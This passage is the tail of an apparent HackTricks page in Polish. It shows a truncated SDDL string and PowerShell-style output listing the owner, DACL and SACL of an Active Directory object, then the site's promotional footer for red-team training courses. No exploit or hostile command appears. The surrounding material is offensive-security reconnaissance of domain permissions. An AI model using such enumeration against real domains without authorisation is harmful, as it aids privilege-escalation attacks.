5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e5350144
|
||
|
|
||
|
Owner : BUILTIN\Administrators
|
||
|
Group : BUILTIN\Administrators
|
||
|
DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT
|
||
|
AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions,
|
||
|
Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
|
||
|
(CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions,
|
||
|
WriteExtendedAttributes)...}
|
||
|
SystemAcl : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse),
|
||
|
BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users:
|
||
|
SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess
|
||
|
(Traverse)...}
|
||
|
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor
|
||
|
```
|
||
|
{% hint style="success" %}
|
||
|
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Wsparcie dla HackTricks</summary>
|
||
|
|
||
|
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Dziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|